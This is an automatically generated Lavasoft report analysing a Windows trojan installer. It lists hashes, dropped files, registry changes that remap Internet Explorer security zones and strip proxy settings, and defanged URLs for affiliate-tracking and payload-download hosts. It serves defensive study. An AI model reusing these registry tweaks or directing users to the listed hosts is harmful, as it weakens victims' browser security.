Trojan.Generic.11944172_e024fb5336

by malwarelabrobot on May 14th, 2016 in Malware Descriptions.

Trojan.Generic.11944172 (B) (Emsisoft), Trojan.Generic.11944172 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: e024fb5336b77feb46b897cdcbb42bd4
SHA1: d53351936b8377c6a25856bad6329c73cfec4a0b
SHA256: 9eae7c704523ce71991724704bc029f49e82de8be7ba1fd43de72eadfe5aa7c4
SSDeep: 98304:BsPrm85pf4S709dSoEG7EC4T5d8tbB75RKg6EhZRu HYC:b8xcSoEgECO05zTaC
Size: 5122042 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1764
cpSetup.exe:260

The Trojan injects its code into the following process(es):

Setup__2140_il65.exe:1408

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)

The process cpSetup.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (0 bytes)

The process Setup__2140_il65.exe:1408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)

Registry activity

The process %original file name%.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 34 9F 92 08 48 FF C4 82 27 05 E5 98 EB 9F 91"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 32 2B D7 B6 4F 61 2A 0B C8 33 1C 3E 03 10 E3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process Setup__2140_il65.exe:1408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\TypeLib]
"(Default)" = "{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0]
"(Default)" = "InstallerLib"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il65.exe"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\VersionIndependentProgID]
"(Default)" = "carpel.groveled"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1463087278"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 18 1C 0C 4E A3 CF 5E 83 A6 05 CB 07 C9 14 AC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCR\carpel.groveled.1\CLSID]
"(Default)" = "{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\carpel.groveled\CurVer]
"(Default)" = "carpel.groveled.1"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"(Default)" = "{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}]
"(Default)" = "IBoot"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\ProgID]
"(Default)" = "carpel.groveled.1"

[HKCR\carpel.groveled]
"(Default)" = "Inst Class"

[HKCR\carpel.groveled.1]
"(Default)" = "Inst Class"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level"

Dropped PE files

MD5	File path
fae6dcd512e610217f19251ab65624fd	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Setup__2140_il65.exe
a5f8399a743ab7f9c88c645c35b1ebb5	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh2.tmp\NSISdl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	57344	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	249856	2536	2560	3.13928	7e17f704d3bfebc09c619c31ae04b106

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 76
1f80adc186d38569a7f12b37bfb110ae
d75f64a4fc6e1e630f3a51c92ad3c93f
879651a405ee0a51e41803ce9bcb4634
7cbf36c08b44adbda84a760fcb3d5bd5
95259d62d096d69e6c71124d76d2742e
4251897fc31de2b714ccd3c165ed3c22
b958be3153aacfa25cceea183ef7dd3e
891f61a5480eeb26ce51a0fd77355991
6ebad71edda218ef8102afe3432bc334
0ad1ef2f250441d9ae9594b8793c569f
faa24adbd70ff86f783e1419d2115763
723ccdfe9da6d78a751fe606dea351aa
93711c4ab5b6416877a200c6f1a26f70
8eef73e34ed320b0a121902ac1d3ab50
21b13c0e699f2e1a2fc63088e1de4dc1
28cb970d9a603307bbfce338e45bd285
3392bcf5c59acc67d5817989b6ac74bd
4f67278caf52bca6a599c78fd5751400
feb6e129679225efba86b059cca01931
8b6484933de890c4d13e0ffa534de649
defe46a11799c224eb650f9e362aea5d
4270445c87bd8d346291d62413ed0740
5a2b6322d2b8d9a7df6bb0a489d5dae9
2634dc3da87a016d964fbdf1f33bd999
e6333d8fd797d71aae7b43f8c5206cda

URLs

URL	IP
hxxp://46.21.100.248/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.16.169.88
hxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	54.88.21.193
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://dyno3mlj15jgv.cloudfront.net/V35/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/finalize.php
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png
hxxp://www.secularistsarakolet.site/index.php	54.83.41.157
hxxp://www.secularistsarakolet.site/finalize.php	54.83.41.157
hxxp://up.freeo9.spacehxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://www.secularistsarakolet.site/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png	54.83.41.157
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png	54.83.41.157
hxxp://cdn1.downloadcrest.com/V35/amipb.js	52.85.173.7
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif	52.85.173.111
hxxp://set.downor3.spacehxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	54.88.21.193
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png	52.85.173.111
hxxp://get.wenter3.space/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11	52.85.173.149
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif	52.85.173.111
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.16.169.88
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif	52.85.173.111
hxxp://up.freeo9.spacehxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://up.freeo9.spacehxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif	52.85.173.111
